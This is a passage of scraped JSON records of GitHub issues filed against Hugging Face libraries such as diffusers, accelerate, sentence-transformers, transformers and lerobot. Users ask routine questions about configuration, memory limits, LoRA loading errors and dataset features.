"Document how to use Qwen 2.5", "body": "### Feature request\n\nQwen 2.5 7B Instruct on EC2 with HF DL AMI\r\nQwen 2.5 7B Instruct on Sagemaker with HF DLC Neuronx TGI\r\nMaybe something for the code version too? \r\nDependency of adding the model to the cache\n\n### Motivation\n\nincrease AMI and DLC usage\n\n### Your contribution\n\ndoc", "url": "https://github.com/huggingface/optimum-neuron/issues/750", "state": "closed", "labels": [ "Stale" ], "created_at": "2024-12-17T16:03:25Z", "updated_at": "2025-01-22T08:04:54Z", "user": "pagezyhf" }, { "repo": "huggingface/accelerate", "number": 3294, "title": "How to run accelerate with PYTORCH_ENABLE_MPS_FALLBACK", "body": "### System Info\n\n```Shell\nMacOS \r\n\r\ntransformers>=4.35.1\r\ndatasets[audio]>=2.14.7\r\naccelerate>=0.24.1\r\nmatplotlib\r\nwandb\r\ntensorboard\r\nCython\r\n\r\n- `Accelerate` version: 1.2.1\r\n- Platform: macOS-14.7.1-arm64-arm-64bit\r\n- `accelerate` bash location: .venv/bin/accelerate\r\n- Python version: 3.12.3\r\n- Numpy version: 2.0.2\r\n- PyTorch version (GPU?): 2.5.1 (False)\r\n- PyTorch XPU available: False\r\n- PyTorch NPU available: False\r\n- PyTorch MLU available: False\r\n- PyTorch MUSA available: False\r\n- System RAM: 64.00 GB\r\n- `Accelerate` default config:\r\n\tNot found\n```\n\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] One of the scripts in the examples/ folder of Accelerate or an officially supported `no_trainer` script in the `examples` folder of the `transformers` repo (such as `run_no_trainer_glue.py`)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nHow to set `PYTORCH_ENABLE_MPS_FALLBACK` environment variable when running a script with accelerate. The accelerate is not picking up the PYTORCH_ENABLE_MPS_FALLBACK environment variable when running a script, no matter where this variable is set. I tried to set this variable in the script, in the command line and in the `./zshenv`, and still PyTorch is complaining it does not see this variable.\n\n### Expected behavior\n\nexpected the PYTORCH_ENABLE_MPS_FALLBACK variable be visible in the sub-process/thread.", "url": "https://github.com/huggingface/accelerate/issues/3294", "state": "closed", "labels": [], "created_at": "2024-12-15T07:03:41Z", "updated_at": "2025-01-23T15:06:57Z", "user": "mirodil-ml" }, { "repo": "huggingface/diffusers", "number": 10223, "title": "Where should I obtain the lora-sdxl-dreambooth-id in Inference", "body": "### Describe the bug\n\nI tried to upload the download link from the README file generated during training, but an error indicated it was incorrect. Where should I obtain the lora-id for Inference?\n\n### Reproduction\n\nREADME.md:\r\n---\r\nbase_model: /data/ziqiang/czc/diffusers/examples/dreambooth/model\r\nlibrary_name: diffusers\r\nlicense: openrail++\r\ninstance_prompt: a photo of sks dog\r\nwidget: []\r\ntags:\r\n- text-to-image\r\n- text-to-image\r\n- diffusers-training\r\n- diffusers\r\n- lora\r\n- template:sd-lora\r\n- stable-diffusion-xl\r\n- stable-diffusion-xl-diffusers\r\n---\r\n\r\n\r\n\r\n\r\n# SDXL LoRA DreamBooth - daniu111/output\r\n\r\n\r\n\r\n## Model description\r\n\r\nThese are daniu111/output LoRA adaption weights for /data/ziqiang/czc/diffusers/examples/dreambooth/model.\r\n\r\nThe weights were trained using [DreamBooth](https://dreambooth.github.io/).\r\n\r\nLoRA for the text encoder was enabled: False.\r\n\r\nSpecial VAE used for training: /data/ziqiang/czc/diffusers/examples/dreambooth/model/vae.\r\n\r\n## Trigger words\r\n\r\nYou should use a photo of sks dog to trigger the image generation.\r\n\r\n## Download model\r\n\r\nWeights for this model are available in Safetensors format.\r\n\r\n[Download](daniu111/output/tree/main) them in the Files & versions tab.\r\n\r\n\r\n\r\n## Intended uses & limitations\r\n\r\n#### How to use\r\n\r\n```python\r\n# TODO: add an example code snippet for running this diffusion pipeline\r\n```\r\n\r\n#### Limitations and bias\r\n\r\n[TODO: provide examples of latent issues and potential remediations]\r\n\r\n## Training details\r\n\r\n[TODO: describe the data used to train the model]\r\n\r\n\r\nInference:\r\nfrom huggingface_hub.repocard import RepoCard\r\nfrom diffusers import DiffusionPipeline\r\nimport torch\r\n\r\nlora_model_id = <\"lora-sdxl-dreambooth-id\">\r\ncard = RepoCard.load(lora_model_id)\r\nbase_model_id = card.data.to_dict()[\"base_model\"]\r\n\r\npipe = DiffusionPipeline.from_pretrained(base_model_id, torch_dtype=torch.float16)\r\npipe = pipe.to(\"cuda\")\r\npipe.load_lora_weights(lora_model_id)\r\nimage = pipe(\"A picture of a sks dog in a bucket\", num_inference_steps=25).images[0]\r\nimage.save(\"sks_dog.png\")\r\n\r\n\"The lora-dreambooth-sdxl-id seems to need to be uploaded, but I don't know where to obtain this ID.\"\n\n### Logs\n\n_No response_\n\n### System Info\n\n- \ud83e\udd17 Diffusers version: 0.32.0.dev0\r\n- Platform: Linux-5.4.0-198-generic-x86_64-with-glibc2.31\r\n- Running on Google Colab?: No\r\n- Python version: 3.12.4\r\n- PyTorch version (GPU?): 2.4.0 (True)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Huggingface_hub version: 0.26.2\r\n- Transformers version: 4.46.3\r\n- Accelerate version: 1.1.1\r\n- PEFT version: 0.7.0\r\n- Bitsandbytes version: not installed\r\n- Safetensors version: 0.4.5\r\n- xFormers version: 0.0.27.post2\r\n- Accelerator: NVIDIA RTX A6000, 49140 MiB\r\nNVIDIA RTX A6000, 49140 MiB\r\nNVIDIA RTX A6000, 49140 MiB\r\n- Using GPU in script?: \r\n- Using distributed or parallel set-up in script?: \n\n### Who can help?\n\n@hlky ", "url": "https://github.com/huggingface/diffusers/issues/10223", "state": "open", "labels": [ "bug", "stale" ], "created_at": "2024-12-14T06:34:56Z", "updated_at": "2025-02-07T15:03:24Z", "comments": 5, "user": "Zarato2122" }, { "repo": "huggingface/lerobot", "number": 575, "title": "Gello dataset converter", "body": "I made a converter for the [Gello](https://wuphilipp.github.io/gello_site/) dataset format (pickles containing dicts with all the observations). \r\n\r\nIf this is of interest, I am willing to contribute it back here. \r\n\r\nThe current code can be found [here](https://github.com/tlpss/lerobot/blob/tlpss-dev/lerobot/common/datasets/push_dataset_to_hub/gello_pkl_format.py). It needs some cleanup and maybe a convenient way to specify the mapping of dict keys in case you have a different number of cameras or other sensors. Wanted to see if there is any interest in this, before I make the effort to clean it up.", "url": "https://github.com/huggingface/lerobot/issues/575", "state": "closed", "labels": [ "enhancement", "question", "dataset", "stale" ], "created_at": "2024-12-13T15:47:58Z", "updated_at": "2025-10-08T08:50:40Z", "user": "tlpss" }, { "repo": "huggingface/diffusers", "number": 10207, "title": "KolorsPipeline does not support from_single_file", "body": "from diffusers import KolorsPipeline\r\nKolorsPipeline.from_single_file(\"models/kolrs-8steps.safetensors\")\r\n \r\n\r\nHow does KolorsPipeline load a single file model?", "url": "https://github.com/huggingface/diffusers/issues/10207", "state": "open", "labels": [ "stale", "single_file" ], "created_at": "2024-12-13T09:44:46Z", "updated_at": "2025-01-12T15:02:46Z", "comments": 3, "user": "Thekey756" }, { "repo": "huggingface/sentence-transformers", "number": 3134, "title": "How to set a proper batchsize when using CachedMultipleNegativesRankingLoss?", "body": "When using the [MultipleNegativesRankingLoss](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#multiplenegativesrankingloss), I tried different batchsize(per_device_train_batch_size) setting, and found that 512 was the maximum. When batchsize was greater than 512, GPU memory OOM was happened.\r\n\r\nAs stated in the document of [CachedMultipleNegativesRankingLoss](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#cachedmultiplenegativesrankingloss):\r\n\r\n> GradCache is a smart way to solve this problem. It achieves the goal by dividing the computation into two stages of embedding and loss calculation, which both can be scaled by mini-batches. As a result, memory of constant size (e.g. that works with batch size = 32) can now process much larger batches (e.g. 65536).\r\n\r\nSo, I tried CachedMultipleNegativesRankingLoss, and the mini_batch_size of CachedMultipleNegativesRankingLoss can go as high as 2048. mini_batch_size greather than 2048 will cause GPU memory OOM. \r\n\r\nNevertheless, When setting the mini_batch_size as 2048, I can still increase the global batchsize(per_device_train_batch_size). Generally speaking, larger batchsize will achieve better performance in the constrastive learning settings. So, I tried different batchsize(per_device_train_batch_size), and found it can be as large as 1048576 and it won't cause GPU memory OOM (but the GPU utilization is 100%). So, I am wondering how to set a proper batchsize(per_device_train_batch_size), can it be infinite big?", "url": "https://github.com/huggingface/sentence-transformers/issues/3134", "state": "open", "labels": [], "created_at": "2024-12-13T09:25:34Z", "updated_at": "2024-12-27T13:46:17Z", "user": "awmoe" }, { "repo": "huggingface/sentence-transformers", "number": 3133, "title": "How to avoid the long time waiting before start training?", "body": "Dear developer,\r\n\r\nThanks for the great sentence-transformers library!\r\n\r\nI am finetuning the [sentence-transformers/paraphrase-multilingual-MiniLM-L12-v2](https://huggingface.co/sentence-transformers/paraphrase-multilingual-MiniLM-L12-v2) using my own data following the tutorial from: https://sbert.net/docs/sentence_transformer/training_overview.html\r\n\r\nI first finetuned it with a toy dataset containing only hundreds of triplet sentence samples, and everything was ok, and the finetuning was very fast.\r\n\r\nAfter that, I finetuned it with the formal big dataset containing 100 million triplet sentence samples. I found that it had to wait a long time (about 60 minutes) to start training. And when the data is bigger, the waiting time is longer.\r\n\r\nSpecifically:\r\n\r\n1. It first spent 5 minutes to `Generating train split`.\r\n2. Then spent 30 minutes to dataset mapping. \r\n3. After that, it printed `Detected kernel version 4.18.0, which is below the recommended minimum of 5.5.0; this can cause the process to hang. It is recommended to upgrade the kernel to the minimum version or higher.`.\r\n4. and waiting about 60 minutes to start the real training.\r\n\r\nDuring the 60 minutes, I found that the GPU was working but the GPU utilization rate was relatively low (30%) and the GPU memory was not used. What's more, during the 60 minutes, no any log information was printed. Was it doing something like data preparation or tokenization? Could you tell me what was it doing, and how to avoid this long waiting time?\r\n\r\nAfter the 60-minute waiting, it started the real training, and the GPU utilization rate was as high as 80%, and the GPU memory was used around 70GB on H100. What's more, the training progress bar was printing similar as `x/y [69:08:34<130:13:54, 1.09it/s]`. So that I knew it was training.\r\n\r\nI also have another dataset which is 10 times larger than 100 million triplet sentence samples, I worry that I have to wait days to starting the training if I use the huge dataset. \r\n\r\nCould you tell me what was it doing during the 60-minute waiting, and how to avoid this long waiting time?\r\n\r\nThank you very much and look forward to your reply.\r\n\r\n", "url": "https://github.com/huggingface/sentence-transformers/issues/3133", "state": "open", "labels": [], "created_at": "2024-12-13T09:10:32Z", "updated_at": "2024-12-25T03:46:50Z", "user": "awmoe" }, { "repo": "huggingface/lighteval", "number": 447, "title": "[BUG] how to eval large scale model use 1dp+8pp?", "body": "## Describe the bug\r\nI tired to eval a large scale model use1dp+8pp with accelerate. I use the command like the following:\r\n```\r\naccelerate launch --multi_gpu --num_processes=1 run_evals_accelerate.py \\\r\n --model_args=\"pretrained=\" \\\r\n --model_parallel \\\r\n --tasks \\\r\n --output_dir output_dir\r\n```\r\nThe error is ```ValueError: You need to use at least 2 processes to use --multi_gpu```\r\n\r\nHow to solve this problem?\r\n\r\n## Version info\r\nlighteval-0.3.0\r\n", "url": "https://github.com/huggingface/lighteval/issues/447", "state": "closed", "labels": [ "bug" ], "created_at": "2024-12-13T03:56:36Z", "updated_at": "2025-01-02T11:20:20Z", "user": "mxjmtxrm" }, { "repo": "huggingface/diffusers", "number": 10196, "title": "How to finetune Flux-dev full params, 80G OOM ...", "body": "I am using the [train_dreambooth_flux](https://github.com/huggingface/diffusers/blob/main/examples/dreambooth/train_dreambooth_flux.py) script to fine-tune the `flux-dev` model with full parameters using DeepSpeed Stage 2. However, I am still encountering out-of-memory issues on an 80GB GPU. Are there any solutions available to address this problem? Thanks!", "url": "https://github.com/huggingface/diffusers/issues/10196", "state": "open", "labels": [ "training" ], "created_at": "2024-12-12T09:24:18Z", "updated_at": "2025-08-20T13:19:20Z", "user": "huangjun12" }, { "repo": "huggingface/chat-ui", "number": 1627, "title": "Cookie \u201chf-chat\u201d has been rejected because there is an existing \u201csecure\u201d cookie.", "body": "## Bug description\r\n\r\nI use `ghcr.io/huggingface/chat-ui-db:latest` to host `ChatUI` in docker. If `PUBLIC_ORIGIN=\"http://localhost\"` in `.env.local` and visit `ChatUI` through `http://localhost:3000`, it works well. Then I try to replace `localhost` by my domain name `qiangwulab.sjtu.edu.cn`. For the sake of testing, I modify `/etc/hosts` so that `qiangwulab.sjtu.edu.cn` is resolved to `127.0.0.1`. I visit `ChatUI` through `http://qiangwulab.sjtu.edu.cn:3000`. It does not work with a similar page as in https://github.com/huggingface/chat-ui/issues/1057. The firefox console shows\r\n```\r\nCookie \u201chf-chat\u201d has been rejected because a non-HTTPS cookie can\u2019t be set as \u201csecure\u201d.\r\n```\r\nhttps://github.com/huggingface/chat-ui/issues/1057 says that I should use `ALLOW_INSECURE_COOKIES=true`. It still does not work, and the firefox console shows\r\n```\r\nCookie \u201chf-chat\u201d has been rejected because there is an existing \u201csecure\u201d cookie.\r\n```\r\n`ALLOW_INSECURE_COOKIES=true` seems to be Legacy. Thus, I also tried `COOKIE_SAMESITE=\"lax\"` and `COOKIE_SECURE=false`. The effect is the same. The firefox console shows\r\n```\r\nCookie \u201chf-chat\u201d has been rejected because there is an existing \u201csecure\u201d cookie.\r\n```\r\nIs it possible to use `http` for domain name other than `localhost`?\r\n\r\n## Steps to reproduce\r\n\r\n\r\n\r\n## Screenshots\r\n\r\n\r\n\r\n## Context\r\n\r\n### Logs\r\n\r\n\r\n\r\n```\r\n// logs here if relevant\r\n```\r\n\r\n### Specs\r\n\r\n- **OS**: ubuntu 24.04\r\n- **Browser**: firefox\r\n- **chat-ui commit**: ghcr.io/huggingface/chat-ui-db:latest\r\n\r\n### Config\r\n\r\n\r\n\r\n## Notes\r\n\r\n\r\n", "url": "https://github.com/huggingface/chat-ui/issues/1627", "state": "open", "labels": [ "bug" ], "created_at": "2024-12-12T07:04:26Z", "updated_at": "2024-12-12T07:04:26Z", "comments": 0, "user": "ljw20180420" }, { "repo": "huggingface/diffusers", "number": 10190, "title": "How to use fluxfill to repalce background\uff1f", "body": "I want to use fluxfill to change the background, but I find that the prompt words are almost useless, and the output image is more like the original image. \r\nI have tested multiple guidance_scale parameters, but found that the resulting image is more related to the original image, and less related to the prompt word.", "url": "https://github.com/huggingface/diffusers/issues/10190", "state": "closed", "labels": [], "created_at": "2024-12-11T10:48:27Z", "updated_at": "2025-05-23T12:12:28Z", "user": "babyta" }, { "repo": "huggingface/sentence-transformers", "number": 3132, "title": "How to train a model with DDP for TSDAE", "body": "hello, I want to train a model using TSDAE method.\r\n\r\nIs there any way to train with DDP(Multi-GPU)?\r\n\r\nI already read your sample code. \r\nBut I'm not sure how to apply DenoisingAutoEncoderDataset in SentenceTransformerTrainer.\r\n([[v3] Training refactor - MultiGPU, loss logging, bf16, etc](https://github.com/UKPLab/sentence-transformers/pull/2449))", "url": "https://github.com/huggingface/sentence-transformers/issues/3132", "state": "closed", "labels": [], "created_at": "2024-12-11T10:39:30Z", "updated_at": "2024-12-11T14:04:32Z", "user": "OnAnd0n" }, { "repo": "huggingface/diffusers", "number": 10180, "title": "Can't load multiple loras when using Flux Control LoRA ", "body": "### Describe the bug\n\nI was trying out the FluxControlPipeline with the Control LoRA introduced in #9999 , but had issues loading in multiple loras. \r\n\r\nFor example, if I load the depth lora first and then the 8-step lora, it errors on the 8-step lora, and if I load the 8-step lora first and then the depth lora, it errors when loading the depth lora. \r\n\r\n\n\n### Reproduction\n\n```\r\nfrom diffusers import FluxControlPipeline\r\nfrom huggingface_hub import hf_hub_download\r\nimport torch\r\n\r\ncontrol_pipe = FluxControlPipeline.from_pretrained(\"black-forest-labs/FLUX.1-dev\", torch_dtype=torch.bfloat16).to(\"cuda\")\r\ncontrol_pipe.load_lora_weights(\"black-forest-labs/FLUX.1-Depth-dev-lora\")\r\ncontrol_pipe.load_lora_weights(hf_hub_download(\"ByteDance/Hyper-SD\", \"Hyper-FLUX.1-dev-8steps-lora.safetensors\"))\r\n\r\n```\n\n### Logs\n\n```shell\nAttributeError Traceback (most recent call last)\r\nCell In[6], line 8\r\n 5 control_pipe = FluxControlPipeline.from_pretrained(\"black-forest-labs/FLUX.1-dev\", torch_dtype=torch.bfloat16).to(\"cuda\")\r\n 7 control_pipe.load_lora_weights(\"black-forest-labs/FLUX.1-Depth-dev-lora\")\r\n----> 8 control_pipe.load_lora_weights(\r\n 9 hf_hub_download(\r\n 10 \"ByteDance/Hyper-SD\", \"Hyper-FLUX.1-dev-8steps-lora.safetensors\"\r\n 11 ),\r\n 12 adapter_name=\"HyperFlux\",\r\n 13 )\r\n\r\nFile ~/.venv/lib/python3.10/site-packages/diffusers/loaders/lora_pipeline.py:1856, in FluxLoraLoaderMixin.load_lora_weights(self, pretrained_model_name_or_path_or_dict, adapter_name, **kwargs)\r\n 1849 transformer_norm_state_dict = {\r\n 1850 k: state_dict.pop(k)\r\n 1851 for k in list(state_dict.keys())\r\n 1852 if \"transformer.\" in k and any(norm_key in k for norm_key in self._control_lora_supported_norm_keys)\r\n 1853 }\r\n 1855 transformer = getattr(self, self.transformer_name) if not hasattr(self, \"transformer\") else self.transformer\r\n-> 1856 has_param_with_expanded_shape = self._maybe_expand_transformer_param_shape_or_error_(\r\n 1857 transformer, transformer_lora_state_dict, transformer_norm_state_dict\r\n 1858 )\r\n 1860 if has_param_with_expanded_shape:\r\n 1861 logger.info(\r\n 1862 \"The LoRA weights contain parameters that have different shapes that expected by the transformer. \"\r\n 1863 \"As a result, the state_dict of the transformer has been expanded to match the LoRA parameter shapes. \"\r\n 1864 \"To get a comprehensive list of parameter names that were modified, enable debug logging.\"\r\n 1865 )\r\n\r\nFile ~/.venv/lib/python3.10/site-packages/diffusers/loaders/lora_pipeline.py:2316, in FluxLoraLoaderMixin._maybe_expand_transformer_param_shape_or_error_(cls, transformer, lora_state_dict, norm_state_dict, prefix)\r\n 2314 if isinstance(module, torch.nn.Linear):\r\n 2315 module_weight = module.weight.data\r\n-> 2316 module_bias = module.bias.data if hasattr(module, \"bias\") else None\r\n 2317 bias = module_bias is not None\r\n 2319 lora_A_weight_name = f\"{name}.lora_A.weight\"\r\n\r\nAttributeError: 'NoneType' object has no attribute 'data'\n```\n\n\n### System Info\n\n- \ud83e\udd17 Diffusers version: 0.32.0.dev0\r\n- Platform: Linux-5.15.0-124-generic-x86_64-with-glibc2.35\r\n- Running on Google Colab?: No\r\n- Python version: 3.10.12\r\n- PyTorch version (GPU?): 2.5.1+cu124 (True)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Huggingface_hub version: 0.26.5\r\n- Transformers version: 4.47.0\r\n- Accelerate version: 1.2.0\r\n- PEFT version: 0.14.0\r\n- Bitsandbytes version: not installed\r\n- Safetensors version: 0.4.5\r\n- xFormers version: not installed\r\n- Accelerator: NVIDIA H100 80GB HBM3, 81559 MiB\r\n- Using GPU in script?: Yes\r\n- Using distributed or parallel set-up in script?: No\n\n### Who can help?\n\n@a-r-r-o-w @sayakpaul ", "url": "https://github.com/huggingface/diffusers/issues/10180", "state": "closed", "labels": [ "bug", "help wanted", "lora" ], "created_at": "2024-12-10T21:40:24Z", "updated_at": "2024-12-20T09:00:33Z", "comments": 11, "user": "jonathanyin12" }, { "repo": "huggingface/transformers", "number": 35186, "title": "How to convert my Mask2Former model (ResNet-50 backbone) to Hugging Face transformer", "body": "### System Info\n\n```shell\n- `transformers` version: 4.34.0\r\n- Platform: Linux-6.8.0-31-generic-x86_64-with-glibc2.17\r\n- Python version: 3.8.20\r\n- Huggingface_hub version: 0.17.3\r\n- Safetensors version: 0.4.5\r\n- Accelerate version: 0.23.0\r\n- Accelerate config: not found\r\n- PyTorch version (GPU?): 2.0.1+cu117 (True)\r\n- Tensorflow version (GPU?): not installed (NA)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Using GPU in script?: No\r\n- Using distributed or parallel set-up in script?: No\n```\n\n\n### Information\n\n- [X] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\nI found the following script, but it only supports conversion for Mask2Former model (swin backbone) https://github.com/huggingface/transformers/blob/main/src/transformers/models/mask2former/convert_mask2former_original_pytorch_checkpoint_to_pytorch.py\r\n\r\nMay I ask for some guidance on how to adjust the script so that it can support ResNet-50 architecture?\n\n### Expected behavior\n\n```shell\nConvert my Mask2Former model (ResNet-50 backbone) to Hugging Face transformer\n```\n\n\n### Checklist\n\n- [X] I have read the migration guide in the readme. ([pytorch-transformers](https://github.com/huggingface/transformers#migrating-from-pytorch-transformers-to-transformers); [pytorch-pretrained-bert](https://github.com/huggingface/transformers#migrating-from-pytorch-pretrained-bert-to-transformers))\n- [X] I checked if a related official extension example runs on my machine.", "url": "https://github.com/huggingface/transformers/issues/35186", "state": "closed", "labels": [], "created_at": "2024-12-10T19:17:22Z", "updated_at": "2025-01-18T08:03:21Z", "user": "yujunwei04" }, { "repo": "huggingface/datasets", "number": 7318, "title": "Introduce support for PDFs", "body": "### Feature request\n\nThe idea (discussed in the Discord server with @lhoestq ) is to have a Pdf type like Image/Audio/Video. For example [Video](https://github.com/huggingface/datasets/blob/main/src/datasets/features/video.py) was recently added and contains how to decode a video file encoded in a dictionary like {\"path\": ..., \"bytes\": ...} as a VideoReader using decord. We want to do the same with pdf and get a [pypdfium2.PdfDocument](https://pypdfium2.readthedocs.io/en/stable/_modules/pypdfium2/_helpers/document.html#PdfDocument).\n\n### Motivation\n\nIn many cases PDFs contain very valuable information beyond text (e.g. images, figures). Support for PDFs would help create datasets where all the information is preserved.\n\n### Your contribution\n\nI can start the implementation of the Pdf type :)", "url": "https://github.com/huggingface/datasets/issues/7318", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-12-10T16:59:48Z", "updated_at": "2024-12-12T18:38:13Z", "comments": 6, "user": "yabramuvdi" }, { "repo": "huggingface/diffusers", "number": 10172, "title": "Raise an error when `len(gligen_images )` is not equal to `len(gligen_phrases)` in `StableDiffusionGLIGENTextImagePipeline`", "body": "To whom it may concern,\r\n\r\nI found that when using `StableDiffusionGLIGENTextImagePipeline`, there is no error raised when `len(gligen_images )` is not equal to `len(gligen_phrases)`. And when I dig into the source code, it seems that these two features are zipped together in a for loop during the preprocessing. I guess this will cause the longer one to be clipped unintentionally. (If my understanding is wrong, feel free to correct me.) Is there any possibility to raise an error or at least warning? Thanks in advance.\r\n\r\nSource Code: https://github.com/huggingface/diffusers/blob/v0.31.0/src/diffusers/pipelines/stable_diffusion_gligen/pipeline_stable_diffusion_gligen_text_image.py#L689\r\n\r\n", "url": "https://github.com/huggingface/diffusers/issues/10172", "state": "closed", "labels": [], "created_at": "2024-12-10T14:25:48Z", "updated_at": "2024-12-11T08:59:44Z", "comments": 1, "user": "abcdefg133hi" }, { "repo": "huggingface/lerobot", "number": 568, "title": "Do I need two SO 100 arms to get started?", "body": "I have printed and assembled one arms, the follower version. Do I need two arms to record datasets and do testing?", "url": "https://github.com/huggingface/lerobot/issues/568", "state": "closed", "labels": [ "question", "robots" ], "created_at": "2024-12-10T13:31:50Z", "updated_at": "2025-10-08T08:45:58Z", "user": "rabhishek100" }, { "repo": "huggingface/transformers", "number": 35152, "title": "how to load the weight of decoder.embed_tokens.weight seperately from the shared weight?", "body": "### System Info\r\n\r\n- `transformers` version: 4.46.3\r\n- Platform: Linux-6.8.0-49-generic-x86_64-with-glibc2.17\r\n- Python version: 3.8.20\r\n- Huggingface_hub version: 0.26.2\r\n- Safetensors version: 0.4.5\r\n- Accelerate version: 1.0.1\r\n- Accelerate config: \tnot found\r\n- PyTorch version (GPU?): 2.4.1+cu121 (True)\r\n- Tensorflow version (GPU?): not installed (NA)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Using distributed or parallel set-up in script?: \r\n- Using GPU in script?: \r\n- GPU type: NVIDIA RTX A4000\r\n\r\n\r\n### Who can help?\r\n\r\n@ArthurZucker @muellerzr @SunMarc\r\n\r\n\r\n### Information\r\n\r\n- [ ] The official example scripts\r\n- [X] My own modified scripts\r\n\r\n### Tasks\r\n\r\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\r\n- [ ] My own task or dataset (give details below)\r\n\r\n### Reproduction\r\n\r\nwhen i use t5 1.1 on seq2seq task, which has 59744 source vocab size and only 32 target vocab size. And To correctly use softmax to calculate each token's probality and score on 32 candidates so I set model.lm_head as below: \r\n```python\r\ntorch.nn.Linear(config.d_model,target_vocab_size=32,bias=False). \r\n\r\nAnd everything looks good when the model is training. But after training, I load the safetensor as below:\r\ncheckpoint_path = \"./resultstest/checkpoint-100\"\r\nconfig = T5Config.from_pretrained(\"./onlychangelmhead/checkpoint-100/config.json\")\r\nmodel = T5ForConditionalGeneration(config)\r\nmodel.lm_head = torch.nn.Linear(config.d_model,target_vocab_size,bias=False)\r\nstate_dict = load_file(f\"{checkpoint_path}/model.safetensors\")\r\nmodel.load_state_dict(state_dict, strict=True) \r\n```\r\n\r\nAnd the issue comes as:\r\n```\r\nTraceback (most recent call last):\r\n File \"bs_based_on_massdic_failed.py\", line 110, in \r\n model.load_state_dict(state_dict, strict=True)\r\n File \"/home/zhi/anaconda3/envs/peptide_completion/lib/python3.8/site-packages/torch/nn/modules/module.py\", line 2215, in load_state_dict\r\n raise RuntimeError('Error(s) in loading state_dict for {}:\\n\\t{}'.format(\r\nRuntimeError: Error(s) in loading state_dict for T5ForConditionalGeneration:\r\n\tMissing key(s) in state_dict: \"encoder.embed_tokens.weight\". \r\n\tsize mismatch for decoder.embed_tokens.weight: copying a param with shape torch.Size([32, 768]) from checkpoint, the shape in current model is torch.Size([59744, 768]).\r\n```\r\n\r\nwhen I try to print the safetensors' shape it shows that the `lm_head. weight` looks fine as size of `[32, 768]`, but with no `decoder.embeded_tokens` or the way I load the safetensor can not load the embeded_tokens's weight from shared weight properly(I guess). So how can I fix that problem to correctly feat this model on my exact target vocab size as 32 but not same as the source vocab's size. It would be very appreciate if you can reply. Best.\r\n\r\n \r\n\r\n### Expected behavior\r\n\r\nUse t5 1.1 to feat on 32 target vocab size task. And load the safetensor properly.", "url": "https://github.com/huggingface/transformers/issues/35152", "state": "closed", "labels": [ "bug" ], "created_at": "2024-12-08T15:46:55Z", "updated_at": "2025-01-22T08:03:52Z", "user": "SoSongzhi" }, { "repo": "huggingface/datasets", "number": 7311, "title": "How to get the original dataset name with username?", "body": "### Feature request\r\n\r\nThe issue is related to ray data https://github.com/ray-project/ray/issues/49008 which it requires to check if the dataset is the original one just after `load_dataset` and parquet files are already available on hf hub.\r\n\r\nThe solution used now is to get the dataset name, config and split, then `load_dataset` again and check the fingerprint. But it's unable to get the correct dataset name if it contains username. So how to get the dataset name with username prefix, or is there another way to query if a dataset is the original one with parquet available?\r\n\r\n@lhoestq \r\n\r\n### Motivation\r\n\r\nhttps://github.com/ray-project/ray/issues/49008\r\n\r\n### Your contribution\r\n\r\nWould like to fix that.", "url": "https://github.com/huggingface/datasets/issues/7311", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-12-08T07:18:14Z", "updated_at": "2025-01-09T10:48:02Z", "user": "npuichigo" }, { "repo": "huggingface/lerobot", "number": 555, "title": "To bulid my own policy, but have errors TypeError: '>' not supported between instances of 'int' and 'dict'", "body": "I improved the act policy in lerobot framework and created a new policy named myact. I mainly did the following:\r\nCreate the my_act folder in the lerobot/common/policies/ path\r\nCreate 'configuration_my_act.py' and 'modeling_my_act.py' in the + my_act folder\r\nCreate lerobot/configs/policy/myact yaml, which is modified to ` name: myact `\r\n\r\nBut when I'm done, run the following command and get an error:\r\n\r\nxvfb-run python lerobot/scripts/train.py \\\r\n hydra.run.dir=mypolicy/train/AlohaInsertion-v0\\\r\n policy=myact \\\r\n dataset_repo_id=lerobot/aloha_sim_insertion_human \\\r\n env=aloha \\\r\n env.task=AlohaInsertion-v0 \r\n\r\n\r\nINFO 2024-12-07 17:01:50 n/logger.py:106 Logs will be saved locally.\r\nINFO 2024-12-07 17:01:50 ts/train.py:337 make_dataset\r\nFetching 56 files: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 56/56 [00:00<00:00, 9842.48it/s]\r\nINFO 2024-12-07 17:01:56 ts/train.py:350 make_env\r\nINFO 2024-12-07 17:01:56 /__init__.py:88 MUJOCO_GL is not set, so an OpenGL backend will be chosen automatically.\r\nINFO 2024-12-07 17:01:57 /__init__.py:96 Successfully imported OpenGL backend: %s\r\nINFO 2024-12-07 17:01:57 /__init__.py:31 MuJoCo library version is: %s\r\nINFO 2024-12-07 17:02:03 ts/train.py:353 make_policy\r\n\r\nError executing job with overrides: ['policy=act', 